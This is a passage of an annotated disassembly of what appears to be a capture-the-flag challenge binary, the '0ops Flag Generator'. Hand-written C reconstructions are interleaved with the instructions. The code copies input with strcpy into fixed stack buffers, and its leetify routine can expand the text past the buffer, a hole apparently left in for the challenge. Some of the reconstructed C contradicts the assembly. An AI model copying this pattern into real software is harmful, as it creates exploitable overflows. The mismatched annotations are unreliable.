| 80487ee: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80487f4: 0f b6 00 movzbl (%eax),%eax | |
| 80487f7: 84 c0 test %al,%al | |
| 80487f9: 75 bc jne 80487b7 <atoi@plt+0x257> | |
| } | |
| 80487fb: 8b 45 08 mov 0x8(%ebp),%eax | |
| 80487fe: 8d 95 f4 fe ff ff lea -0x10c(%ebp),%edx | |
| 8048804: 89 54 24 04 mov %edx,0x4(%esp) | |
| 8048808: 89 04 24 mov %eax,(%esp) | |
| 804880b: e8 e0 fc ff ff call 80484f0 <strcpy@plt> | |
| strcpy(arg0, ebp_10ch); | |
| 8048810: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 8048813: 65 33 05 14 00 00 00 xor %gs:0x14,%eax | |
| 804881a: 74 05 je 8048821 <atoi@plt+0x2c1> | |
| 804881c: e8 bf fc ff ff call 80484e0 <__stack_chk_fail@plt> | |
| 8048821: c9 leave | |
| 8048822: c3 ret | |
| } | |
| void sub_8048823(char *arg0) | |
| { | |
| 8048823: 55 push %ebp | |
| 8048824: 89 e5 mov %esp,%ebp | |
| 8048826: 81 ec 28 01 00 00 sub $0x128,%esp | |
| // Local variables. | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| 804882c: 65 a1 14 00 00 00 mov %gs:0x14,%eax | |
| 8048832: 89 45 f4 mov %eax,-0xc(%ebp) | |
| 8048835: 31 c0 xor %eax,%eax | |
| 8048837: 8b 45 08 mov 0x8(%ebp),%eax | |
| 804883a: 89 44 24 04 mov %eax,0x4(%esp) | |
| 804883e: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 8048844: 89 04 24 mov %eax,(%esp) | |
| 8048847: e8 a4 fc ff ff call 80484f0 <strcpy@plt> | |
| strcpy(ebp_10ch, arg0); | |
| 804884c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 8048852: 89 85 f0 fe ff ff mov %eax,-0x110(%ebp) | |
| 8048858: eb 37 jmp 8048891 <atoi@plt+0x331> | |
| for(ebp_110h = ebp_10ch; *ebp_110h != '\0'; ebp_110h++) { | |
| 804885a: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 8048860: 0f b6 00 movzbl (%eax),%eax | |
| 8048863: 3c 40 cmp $0x40,%al | |
| 8048865: 7e 23 jle 804888a <atoi@plt+0x32a> | |
| 8048867: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 804886d: 0f b6 00 movzbl (%eax),%eax | |
| 8048870: 3c 5a cmp $0x5a,%al | |
| 8048872: 7f 16 jg 804888a <atoi@plt+0x32a> | |
| if(!('A' <= *ebp_110h || *ebp_110h <= 'Z')) continue; | |
| 8048874: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 804887a: 0f b6 00 movzbl (%eax),%eax | |
| 804887d: 83 c8 20 or $0x20,%eax | |
| 8048880: 89 c2 mov %eax,%edx | |
| 8048882: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 8048888: 88 10 mov %dl,(%eax) | |
| *ebp_110h |= 0x20; | |
| 804888a: 83 85 f0 fe ff ff 01 addl $0x1,-0x110(%ebp) | |
| // ->> | |
| 8048891: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 8048897: 0f b6 00 movzbl (%eax),%eax | |
| 804889a: 84 c0 test %al,%al | |
| 804889c: 75 bc jne 804885a <atoi@plt+0x2fa> | |
| } | |
| 804889e: 8b 45 08 mov 0x8(%ebp),%eax | |
| 80488a1: 8d 95 f4 fe ff ff lea -0x10c(%ebp),%edx | |
| 80488a7: 89 54 24 04 mov %edx,0x4(%esp) | |
| 80488ab: 89 04 24 mov %eax,(%esp) | |
| 80488ae: e8 3d fc ff ff call 80484f0 <strcpy@plt> | |
| strcpy(arg0, ebp_10ch); | |
| 80488b3: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 80488b6: 65 33 05 14 00 00 00 xor %gs:0x14,%eax | |
| 80488bd: 74 05 je 80488c4 <atoi@plt+0x364> | |
| 80488bf: e8 1c fc ff ff call 80484e0 <__stack_chk_fail@plt> | |
| 80488c4: c9 leave | |
| 80488c5: c3 ret | |
| } | |
| void sub_80488c6(char *arg0) | |
| { | |
| 80488c6: 55 push %ebp | |
| 80488c7: 89 e5 mov %esp,%ebp | |
| 80488c9: 81 ec 28 01 00 00 sub $0x128,%esp | |
| // Local variables. | |
| char *ebp_114h; | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| unsigned int *val0; | |
| 80488cf: 65 a1 14 00 00 00 mov %gs:0x14,%eax | |
| 80488d5: 89 45 f4 mov %eax,-0xc(%ebp) | |
| 80488d8: 31 c0 xor %eax,%eax | |
| 80488da: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 80488e0: 89 85 ec fe ff ff mov %eax,-0x114(%ebp) | |
| ebp_114h = &ebp_10ch; | |
| 80488e6: 8b 45 08 mov 0x8(%ebp),%eax | |
| 80488e9: 89 85 f0 fe ff ff mov %eax,-0x110(%ebp) | |
| 80488ef: e9 3a 01 00 00 jmp 8048a2e <atoi@plt+0x4ce> | |
| for(ebp_110h = arg0; *ebp_110h != '\0'; ebp_110h++) { | |
| 80488f4: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80488fa: 0f b6 00 movzbl (%eax),%eax | |
| 80488fd: 0f be c0 movsbl %al,%eax | |
| 8048900: 83 e8 41 sub $0x41,%eax | |
| 8048903: 83 f8 39 cmp $0x39,%eax | |
| 8048906: 0f 87 01 01 00 00 ja 8048a0d <atoi@plt+0x4ad> | |
| 804890c: 8b 04 85 c0 8d 04 08 mov 0x8048dc0(,%eax,4),%eax | |
| 8048913: ff e0 jmp *%eax | |
| switch(*ebp_110h) { | |
| case 'A': | |
| case 'a': | |
| 8048915: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 804891b: 8d 50 01 lea 0x1(%eax),%edx | |
| 804891e: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 8048924: c6 00 34 movb $0x34,(%eax) | |
| *val0 = '4'; | |
| 8048927: e9 fb 00 00 00 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'B': | |
| case 'b': | |
| 804892c: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048932: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048935: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 804893b: c6 00 38 movb $0x38,(%eax) | |
| *val0 = '8'; | |
| 804893e: e9 e4 00 00 00 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'E': | |
| case 'e': | |
| 8048943: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048949: 8d 50 01 lea 0x1(%eax),%edx | |
| 804894c: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 8048952: c6 00 33 movb $0x33,(%eax) | |
| *val0 = '3'; | |
| 8048955: e9 cd 00 00 00 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'H': | |
| case 'h': | |
| 804895a: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048960: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048963: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 8048969: c6 00 31 movb $0x31,(%eax) | |
| *val0 = '1'; | |
| 804896c: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048972: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048975: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 804897b: c6 00 2d movb $0x2d,(%eax) | |
| *val0 = '-'; | |
| 804897e: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048984: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048987: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 804898d: c6 00 31 movb $0x31,(%eax) | |
| *val0 = '1'; | |
| 8048990: e9 92 00 00 00 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'I': | |
| case 'i': | |
| 8048995: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 804899b: 8d 50 01 lea 0x1(%eax),%edx | |
| 804899e: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 80489a4: c6 00 21 movb $0x21,(%eax) | |
| *val0 = '!'; | |
| 80489a7: eb 7e jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'L': | |
| case 'l': | |
| 80489a9: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 80489af: 8d 50 01 lea 0x1(%eax),%edx | |
| 80489b2: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 80489b8: c6 00 31 movb $0x31,(%eax) | |
| *val0 = '1'; | |
| 80489bb: eb 6a jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'O': | |
| case 'o': | |
| 80489bd: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 80489c3: 8d 50 01 lea 0x1(%eax),%edx | |
| 80489c6: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 80489cc: c6 00 30 movb $0x30,(%eax) | |
| *val0 = '0'; | |
| 80489cf: eb 56 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'S': | |
| case 's': | |
| 80489d1: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 80489d7: 8d 50 01 lea 0x1(%eax),%edx | |
| 80489da: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 80489e0: c6 00 35 movb $0x35,(%eax) | |
| *val0 = '5'; | |
| 80489e3: eb 42 jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'T': | |
| case 't': | |
| 80489e5: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 80489eb: 8d 50 01 lea 0x1(%eax),%edx | |
| 80489ee: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 80489f4: c6 00 37 movb $0x37,(%eax) | |
| *val0 = '7'; | |
| 80489f7: eb 2e jmp 8048a27 <atoi@plt+0x4c7> | |
| break; | |
| case 'Z': | |
| case 'z': | |
| 80489f9: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 80489ff: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048a02: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 8048a08: c6 00 32 movb $0x32,(%eax) | |
| *val0 = '2'; | |
| 8048a0b: eb 1a jmp 8048a27 <atoi@plt+0x4c7> | |
| default: | |
| 8048a0d: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| val0 = ebp_114h; | |
| 8048a13: 8d 50 01 lea 0x1(%eax),%edx | |
| 8048a16: 89 95 ec fe ff ff mov %edx,-0x114(%ebp) | |
| ebp_114h += 1; | |
| 8048a1c: 8b 95 f0 fe ff ff mov -0x110(%ebp),%edx | |
| 8048a22: 0f b6 12 movzbl (%edx),%edx | |
| 8048a25: 88 10 mov %dl,(%eax) | |
| *val0 = (char)ebp_110h; | |
| } | |
| 8048a27: 83 85 f0 fe ff ff 01 addl $0x1,-0x110(%ebp) | |
| 8048a2e: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| // ->> | |
| 8048a34: 0f b6 00 movzbl (%eax),%eax | |
| 8048a37: 84 c0 test %al,%al | |
| 8048a39: 0f 85 b5 fe ff ff jne 80488f4 <atoi@plt+0x394> | |
| } | |
| 8048a3f: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax | |
| 8048a45: c6 00 00 movb $0x0,(%eax) | |
| *ebp_114h = '\0'; | |
| 8048a48: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048a4b: 8d 95 f4 fe ff ff lea -0x10c(%ebp),%edx | |
| 8048a51: 89 54 24 04 mov %edx,0x4(%esp) | |
| 8048a55: 89 04 24 mov %eax,(%esp) | |
| 8048a58: e8 93 fa ff ff call 80484f0 <strcpy@plt> | |
| strcpy(arg0, ebp_10ch); | |
| 8048a5d: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 8048a60: 65 33 05 14 00 00 00 xor %gs:0x14,%eax | |
| 8048a67: 74 05 je 8048a6e <atoi@plt+0x50e> | |
| 8048a69: e8 72 fa ff ff call 80484e0 <__stack_chk_fail@plt> | |
| 8048a6e: c9 leave | |
| 8048a6f: c3 ret | |
| } | |
| void sub_8048a70(char *arg0) | |
| { | |
| 8048a70: 55 push %ebp | |
| 8048a71: 89 e5 mov %esp,%ebp | |
| 8048a73: 57 push %edi | |
| 8048a74: 81 ec 24 01 00 00 sub $0x124,%esp | |
| // Local variables. | |
| char ebp_10ch[0x100]; | |
| 8048a7a: 65 a1 14 00 00 00 mov %gs:0x14,%eax | |
| 8048a80: 89 45 f4 mov %eax,-0xc(%ebp) | |
| 8048a83: 31 c0 xor %eax,%eax | |
| 8048a85: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048a88: 89 44 24 0c mov %eax,0xc(%esp) | |
| 8048a8c: c7 44 24 08 a8 8e 04 movl $0x8048ea8,0x8(%esp) | |
| 8048a93: 08 | |
| 8048a94: c7 44 24 04 ff 00 00 movl $0xff,0x4(%esp) | |
| 8048a9b: 00 | |
| 8048a9c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 8048aa2: 89 04 24 mov %eax,(%esp) | |
| 8048aa5: e8 a6 fa ff ff call 8048550 <snprintf@plt> | |
| snprintf(ebp_10ch, 0xff, "0ctf{%s", arg0); | |
| 8048aaa: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 8048ab0: b9 ff ff ff ff mov $0xffffffff,%ecx | |
| 8048ab5: 89 c2 mov %eax,%edx | |
| 8048ab7: b8 00 00 00 00 mov $0x0,%eax | |
| 8048abc: 89 d7 mov %edx,%edi | |
| 8048abe: f2 ae repnz scas %es:(%edi),%al | |
| 8048ac0: 89 c8 mov %ecx,%eax | |
| 8048ac2: f7 d0 not %eax | |
| 8048ac4: 8d 50 ff lea -0x1(%eax),%edx | |
| 8048ac7: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 8048acd: 01 d0 add %edx,%eax | |
| 8048acf: 66 c7 00 7d 00 movw $0x7d,(%eax) | |
| ebp_10ch[strlen(ebp_10ch)-1] = '}'; | |
| ebp_10ch[strlen(ebp_10ch)] = '\0'; | |
| 8048ad4: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048ad7: 8d 95 f4 fe ff ff lea -0x10c(%ebp),%edx | |
| 8048add: 89 54 24 04 mov %edx,0x4(%esp) | |
| 8048ae1: 89 04 24 mov %eax,(%esp) | |
| 8048ae4: e8 07 fa ff ff call 80484f0 <strcpy@plt> | |
| strcpy(arg0, ebp_10ch); | |
| 8048ae9: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 8048aec: 65 33 05 14 00 00 00 xor %gs:0x14,%eax | |
| 8048af3: 74 05 je 8048afa <atoi@plt+0x59a> | |
| 8048af5: e8 e6 f9 ff ff call 80484e0 <__stack_chk_fail@plt> | |
| 8048afa: 81 c4 24 01 00 00 add $0x124,%esp | |
| 8048b00: 5f pop %edi | |
| 8048b01: 5d pop %ebp | |
| 8048b02: c3 ret | |
| } | |
| sub_8048b03(int arg0) | |
| { | |
| 8048b03: 55 push %ebp | |
| 8048b04: 89 e5 mov %esp,%ebp | |
| 8048b06: 83 ec 28 sub $0x28,%esp | |
| // Local variables. | |
| char *ebp_0ch; | |
| 8048b09: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048b0c: 89 04 24 mov %eax,(%esp) | |
| 8048b0f: e8 ec f9 ff ff call 8048500 <malloc@plt> | |
| 8048b14: 89 45 f4 mov %eax,-0xc(%ebp) | |
| ebp_0ch = malloc(arg0); | |
| 8048b17: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048b1a: 89 44 24 04 mov %eax,0x4(%esp) | |
| 8048b1e: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 8048b21: 89 04 24 mov %eax,(%esp) | |
| 8048b24: e8 a2 fb ff ff call 80486cb <atoi@plt+0x16b> | |
| sub_80486cb(ebp_0ch, arg0); | |
| 8048b29: 8b 45 f4 mov -0xc(%ebp),%eax | |
| 8048b2c: c9 leave | |
| 8048b2d: c3 ret | |
| return ebp_0ch; | |
| } | |
| int sub_8048b2e() | |
| { | |
| 8048b2e: 55 push %ebp | |
| 8048b2f: 89 e5 mov %esp,%ebp | |
| 8048b31: 83 ec 18 sub $0x18,%esp | |
| 8048b34: c7 04 24 b0 8e 04 08 movl $0x8048eb0,(%esp) | |
| 8048b3b: e8 d0 f9 ff ff call 8048510 <printf@plt> | |
| printf("== 0ops Flag Generator =="); | |
| 8048b40: c7 04 24 ca 8e 04 08 movl $0x8048eca,(%esp) | |
| 8048b47: e8 c4 f9 ff ff call 8048510 <printf@plt> | |
| printf("1. Input Flag"); | |
| 8048b4c: c7 04 24 d8 8e 04 08 movl $0x8048ed8,(%esp) | |
| 8048b53: e8 b8 f9 ff ff call 8048510 <printf@plt> | |
| printf("2. Uppercase"); | |
| 8048b58: c7 04 24 e5 8e 04 08 movl $0x8048ee5,(%esp) | |
| 8048b5f: e8 ac f9 ff ff call 8048510 <printf@plt> | |
| printf("3. Lowercase"); | |
| 8048b64: c7 04 24 f2 8e 04 08 movl $0x8048ef2,(%esp) | |
| 8048b6b: e8 a0 f9 ff ff call 8048510 <printf@plt> | |
| printf("4. Leetify"); | |
| 8048b70: c7 04 24 fd 8e 04 08 movl $0x8048efd,(%esp) | |
| 8048b77: e8 94 f9 ff ff call 8048510 <printf@plt> | |
| printf("5. Add Prefix"); | |
| 8048b7c: c7 04 24 0b 8f 04 08 movl $0x8048f0b,(%esp) | |
| 8048b83: e8 88 f9 ff ff call 8048510 <printf@plt> | |
| printf("6. Output Flag"); | |
| 8048b88: c7 04 24 1a 8f 04 08 movl $0x8048f1a,(%esp) | |
| 8048b8f: e8 7c f9 ff ff call 8048510 <printf@plt> | |
| printf("7. Exit "); | |
| 8048b94: c7 04 24 23 8f 04 08 movl $0x8048f23,(%esp) | |
| 8048b9b: e8 70 f9 ff ff call 8048510 <printf@plt> | |
| printf("========================="); | |
| 8048ba0: c7 04 24 3d 8f 04 08 movl $0x8048f3d,(%esp) | |
| 8048ba7: e8 04 f9 ff ff call 80484b0 <puts@plt> | |
| puts("Your choice: "); | |
| 8048bac: e8 8d fb ff ff call 804873e <atoi@plt+0x1de> | |
| 8048bb1: c9 leave | |
| 8048bb2: c3 ret | |
| return sub_804873e(); | |
| } | |
| int main() | |
| { | |
| 8048bb3: 55 push %ebp | |
| 8048bb4: 89 e5 mov %esp,%ebp | |
| 8048bb6: 83 e4 f0 and $0xfffffff0,%esp | |
| 8048bb9: 83 ec 20 sub $0x20,%esp | |
| // Local variables. | |
| char *esp_18h; | |
| 8048bbc: e8 ac fa ff ff call 804866d <atoi@plt+0x10d> | |
| sub_804866d(); | |
| 8048bc1: c7 44 24 18 00 00 00 movl $0x0,0x18(%esp) | |
| esp_18h = NULL; | |
| 8048bc8: 00 | |
| 8048bc9: e8 60 ff ff ff call 8048b2e <atoi@plt+0x5ce> | |
| while(true) { | |
| 8048bce: 89 44 24 1c mov %eax,0x1c(%esp) | |
| esp_1ch = sub_8048b2e(); | |
| 8048bd2: 83 7c 24 1c 07 cmpl $0x7,0x1c(%esp) | |
| 8048bd7: 0f 87 35 01 00 00 ja 8048d12 <atoi@plt+0x7b2> | |
| 8048bdd: 8b 44 24 1c mov 0x1c(%esp),%eax | |
| 8048be1: c1 e0 02 shl $0x2,%eax | |
| 8048be4: 05 90 8f 04 08 add $0x8048f90,%eax | |
| 8048be9: 8b 00 mov (%eax),%eax | |
| 8048beb: ff e0 jmp *%eax | |
| switch(ebp_1ch) { | |
| case 1: | |
| 8048bed: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048bf1: 85 c0 test %eax,%eax | |
| 8048bf3: 74 0c je 8048c01 <atoi@plt+0x6a1> | |
| if(esp_18h != NULL) { | |
| 8048bf5: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048bf9: 89 04 24 mov %eax,(%esp) | |
| 8048bfc: e8 bf f8 ff ff call 80484c0 <free@plt> | |
| free(esp_18h); | |
| } | |
| 8048c01: c7 04 24 00 01 00 00 movl $0x100,(%esp) | |
| 8048c08: e8 f6 fe ff ff call 8048b03 <atoi@plt+0x5a3> | |
| 8048c0d: 89 44 24 18 mov %eax,0x18(%esp) | |
| esp_18h = sub_8048b03(0x100); | |
| 8048c11: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048c18: e8 f3 f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048c1d: e9 fd 00 00 00 jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 2: | |
| 8048c22: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c26: 85 c0 test %eax,%eax | |
| 8048c28: 74 0c je 8048c36 <atoi@plt+0x6d6> | |
| if(esp_18h != NULL) { | |
| 8048c2a: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c2e: 89 04 24 mov %eax,(%esp) | |
| 8048c31: e8 4a fb ff ff call 8048780 <atoi@plt+0x220> | |
| sub_8048780(esp_18h); | |
| } | |
| 8048c36: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048c3d: e8 ce f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048c42: e9 d8 00 00 00 jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 3: | |
| 8048c47: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c4b: 85 c0 test %eax,%eax | |
| 8048c4d: 74 0c je 8048c5b <atoi@plt+0x6fb> | |
| if(esp_18h != NULL) { | |
| 8048c4f: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c53: 89 04 24 mov %eax,(%esp) | |
| 8048c56: e8 c8 fb ff ff call 8048823 <atoi@plt+0x2c3> | |
| sub_8048823(esp_18h); | |
| } | |
| 8048c5b: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048c62: e8 a9 f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048c67: e9 b3 00 00 00 jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 4: | |
| 8048c6c: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c70: 85 c0 test %eax,%eax | |
| 8048c72: 74 0c je 8048c80 <atoi@plt+0x720> | |
| if(esp_18h != NULL) { | |
| 8048c74: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c78: 89 04 24 mov %eax,(%esp) | |
| 8048c7b: e8 46 fc ff ff call 80488c6 <atoi@plt+0x366> | |
| sub_80488c6(esp_18h); | |
| } | |
| 8048c80: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048c87: e8 84 f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048c8c: e9 8e 00 00 00 jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 5: | |
| 8048c91: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c95: 85 c0 test %eax,%eax | |
| 8048c97: 74 0c je 8048ca5 <atoi@plt+0x745> | |
| if(esp_18h != NULL) { | |
| 8048c99: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048c9d: 89 04 24 mov %eax,(%esp) | |
| 8048ca0: e8 cb fd ff ff call 8048a70 <atoi@plt+0x510> | |
| sub_8048a70(esp_18h); | |
| } | |
| 8048ca5: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048cac: e8 5f f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048cb1: eb 6c jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 6: | |
| 8048cb3: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048cb7: 85 c0 test %eax,%eax | |
| 8048cb9: 74 36 je 8048cf1 <atoi@plt+0x791> | |
| if(esp_18h != NULL) { | |
| 8048cbb: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048cbf: 89 44 24 04 mov %eax,0x4(%esp) | |
| 8048cc3: c7 04 24 51 8f 04 08 movl $0x8048f51,(%esp) | |
| 8048cca: e8 e1 f7 ff ff call 80484b0 <puts@plt> | |
| puts("The Flag is: %s\n", esp_18h); | |
| 8048ccf: 8b 44 24 18 mov 0x18(%esp),%eax | |
| 8048cd3: 89 04 24 mov %eax,(%esp) | |
| 8048cd6: e8 e5 f7 ff ff call 80484c0 <free@plt> | |
| free(esp_18h); | |
| 8048cdb: c7 44 24 18 00 00 00 movl $0x0,0x18(%esp) | |
| 8048ce2: 00 | |
| esp_18h = NULL: | |
| 8048ce3: c7 04 24 4b 8f 04 08 movl $0x8048f4b,(%esp) | |
| 8048cea: e8 21 f8 ff ff call 8048510 <printf@plt> | |
| printf("Done."); | |
| 8048cef: eb 2e jmp 8048d1f <atoi@plt+0x7bf> | |
| } else { | |
| 8048cf1: c7 04 24 62 8f 04 08 movl $0x8048f62,(%esp) | |
| 8048cf8: e8 13 f8 ff ff call 8048510 <printf@plt> | |
| printf("You have to input flag first!"); | |
| } | |
| 8048cfd: eb 20 jmp 8048d1f <atoi@plt+0x7bf> | |
| break; | |
| case 7: | |
| 8048cff: c7 04 24 80 8f 04 08 movl $0x8048f80,(%esp) | |
| 8048d06: e8 05 f8 ff ff call 8048510 <printf@plt> | |
| printf("Bye"); | |
| 8048d0b: b8 00 00 00 00 mov $0x0,%eax | |
| 8048d10: eb 12 jmp 8048d24 <atoi@plt+0x7c4> | |
| return 0; | |
| case 0: | |
| default: | |
| 8048d12: c7 04 24 84 8f 04 08 movl $0x8048f84,(%esp) | |
| 8048d19: e8 f2 f7 ff ff call 8048510 <printf@plt> | |
| printf("Invalid!"); | |
| 8048d1e: 90 nop | |
| 8048d1f: e9 a5 fe ff ff jmp 8048bc9 <atoi@plt+0x669> | |
| } | |
| } | |
| 8048d24: c9 leave | |
| 8048d25: c3 ret | |
| } | |
| 8048d26: 66 90 xchg %ax,%ax | |
| 8048d28: 66 90 xchg %ax,%ax | |
| 8048d2a: 66 90 xchg %ax,%ax | |
| 8048d2c: 66 90 xchg %ax,%ax | |
| 8048d2e: 66 90 xchg %ax,%ax | |
| 8048d30: 55 push %ebp | |
| 8048d31: 57 push %edi | |
| 8048d32: 31 ff xor %edi,%edi | |
| 8048d34: 56 push %esi | |
| 8048d35: 53 push %ebx | |
| 8048d36: e8 65 f8 ff ff call 80485a0 <atoi@plt+0x40> | |
| 8048d3b: 81 c3 c5 22 00 00 add $0x22c5,%ebx | |
| 8048d41: 83 ec 1c sub $0x1c,%esp | |
| 8048d44: 8b 6c 24 30 mov 0x30(%esp),%ebp | |
| 8048d48: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi | |
| 8048d4e: e8 0d f7 ff ff call 8048460 <read@plt-0x40> | |
| 8048d53: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax | |
| 8048d59: 29 c6 sub %eax,%esi | |
| 8048d5b: c1 fe 02 sar $0x2,%esi | |
| 8048d5e: 85 f6 test %esi,%esi | |
| 8048d60: 74 27 je 8048d89 <atoi@plt+0x829> | |
| 8048d62: 8d b6 00 00 00 00 lea 0x0(%esi),%esi | |
| 8048d68: 8b 44 24 38 mov 0x38(%esp),%eax | |
| 8048d6c: 89 2c 24 mov %ebp,(%esp) | |
| 8048d6f: 89 44 24 08 mov %eax,0x8(%esp) | |
| 8048d73: 8b 44 24 34 mov 0x34(%esp),%eax | |
| 8048d77: 89 44 24 04 mov %eax,0x4(%esp) | |
| 8048d7b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) | |
| 8048d82: 83 c7 01 add $0x1,%edi | |
| 8048d85: 39 f7 cmp %esi,%edi | |
| 8048d87: 75 df jne 8048d68 <atoi@plt+0x808> | |
| 8048d89: 83 c4 1c add $0x1c,%esp | |
| 8048d8c: 5b pop %ebx | |
| 8048d8d: 5e pop %esi | |
| 8048d8e: 5f pop %edi | |
| 8048d8f: 5d pop %ebp | |
| 8048d90: c3 ret | |
| 8048d91: eb 0d jmp 8048da0 <atoi@plt+0x840> | |
| 8048d93: 90 nop | |
| 8048d94: 90 nop | |
| 8048d95: 90 nop | |
| 8048d96: 90 nop | |
| 8048d97: 90 nop | |
| 8048d98: 90 nop | |
| 8048d99: 90 nop | |
| 8048d9a: 90 nop | |
| 8048d9b: 90 nop | |
| 8048d9c: 90 nop | |
| 8048d9d: 90 nop | |
| 8048d9e: 90 nop | |
| 8048d9f: 90 nop | |
| 8048da0: f3 c3 repz ret | |
| Disassembly of section .fini: | |
| 08048da4 <.fini>: | |
| 8048da4: 53 push %ebx | |
| 8048da5: 83 ec 08 sub $0x8,%esp | |
